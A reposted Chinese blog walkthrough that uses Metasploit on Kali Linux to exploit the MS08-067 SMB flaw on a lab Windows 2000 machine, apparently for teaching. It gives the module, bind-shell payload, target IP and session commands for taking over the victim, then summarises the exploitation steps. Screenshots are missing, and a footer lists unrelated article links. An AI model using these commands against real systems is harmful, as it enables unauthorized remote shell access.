Kali linux 2016.2(Rolling)的利用MSF攻击windows小案例(exploits + payloads + taegets)(博主推荐)

简介:

 本博文举的例,是利用远程溢出windows服务器。

   Exploit/windows/smb/ms08_067_netapi。

   Payload :    windows/shell/bind_tcp

  Target:  windows 2000

  

 

 

  以下是受害者机器情况。

 

 

 

 

 

 

 

 

 

   以下是攻击者机器

 

 

 

 

 

 

 

 

 

   这是show  exploits

 

 

 

   use   exploit/windows/smb/ms08_067_netapi

 

 

 

 

 

 

   以下是show payloads

 

 

 

 

 

   set  PAYLOAD   windows/shell/bind_tcp

 

 

 

 

 

   set   RHOSt    192.168.0.15

 

 

 

 

 

   show  targets

 

    如果将targets什么都不设置,或者设置为0的话,它就是自动探测。

 

 

 

 

   即,此刻,就是已经成功攻下了受害者机器。

  然后,做我们想要做的事情了。

 

 

 

 

 

   它会将我们从攻击者到受害者机器,的这一过程建议一个会话。在后台。

    通过session来查看。

  通过session -h来查看session命令的使用。

 

  

  一般用session -i  编号来切入到会话。

 

 

 

 

 

 

 

 

 

 

 

 

  总结  exploits + payloads + taegets

1、连接到远程系统的漏洞端口

2、交换协议序列直到到达漏洞触发点

3、注入利用代码,其中包含了直接或间接的修改

  返回地址为我们payload的指令以及nop指令,这增加了我们的代码被执行的机会。

4、 后续利用,可以是在受害主机上绑定任意端口的命令提示符或一个已经被创建的用户连接到远程系统或可能是一个GUI客户端连接到远程系统

 



本文转自大数据躺过的坑博客园博客,原文链接:http://www.cnblogs.com/zlslch/p/6891406.html,如需转载请自行联系原作者

相关文章
|
15天前
|
Linux 开发工具
Kali Linux配置阿里源
在配置Linux系统源前,建议先备份源列表。打开`/etc/apt/sources.list`,将原有官方源注释或删除,然后可以选择添加国内镜像源,如中科大、阿里云、清华大学、浙大或东软等源。确保每个源格式正确,以`deb`开头,`main non-free contrib`结尾。保存并退出(使用`:wq`或`:wq!`),之后运行`apt-get update`来下载新配置的源并验证是否成功。如果下载速度慢,可中断(`Ctrl+C`)后更换网络重试。
142 0
|
15天前
|
iOS开发 MacOS Windows
|
14天前
|
安全 Linux 网络安全
FreeLearning Kali Linux 译文集翻译完成
FreeLearning Kali Linux 译文集翻译完成
15 0
|
15天前
|
NoSQL Linux Redis
Redis的介绍,以及Redis的安装(本机windows版,虚拟机Linux版)和Redis常用命令的介绍
Redis的介绍,以及Redis的安装(本机windows版,虚拟机Linux版)和Redis常用命令的介绍
35 0
|
15天前
|
安全 Python Linux
Kali Linux下Volatility2.6常见问题疑难杂症-内存取证信息安全管理与评估
Kali Linux下Volatility2.6常见问题疑难杂症-内存取证信息安全管理与评估
Kali Linux下Volatility2.6常见问题疑难杂症-内存取证信息安全管理与评估
|
15天前
|
前端开发 Linux iOS开发
【Flutter前端技术开发专栏】Flutter在桌面应用(Windows/macOS/Linux)的开发实践
【4月更文挑战第30天】Flutter扩展至桌面应用开发,允许开发者用同一代码库构建Windows、macOS和Linux应用,提高效率并保持平台一致性。创建桌面应用需指定目标平台,如`flutter create -t windows my_desktop_app`。开发中注意UI适配、性能优化、系统交互及测试部署。UI适配利用布局组件和`MediaQuery`,性能优化借助`PerformanceLogging`、`Isolate`和`compute`。
【Flutter前端技术开发专栏】Flutter在桌面应用(Windows/macOS/Linux)的开发实践
|
15天前
|
Linux Python Windows
Python虚拟环境virtualenv安装保姆级教程(Windows和linux)
Python虚拟环境virtualenv安装保姆级教程(Windows和linux)
|
15天前
|
Linux 开发工具 数据安全/隐私保护
0-超详细基础安装linux系统-kali
0-超详细基础安装linux系统-kali
|
15天前
|
SQL 监控 安全
Linux&Windows 日志分析 陇剑杯 CTF
Linux&Windows 日志分析 陇剑杯 CTF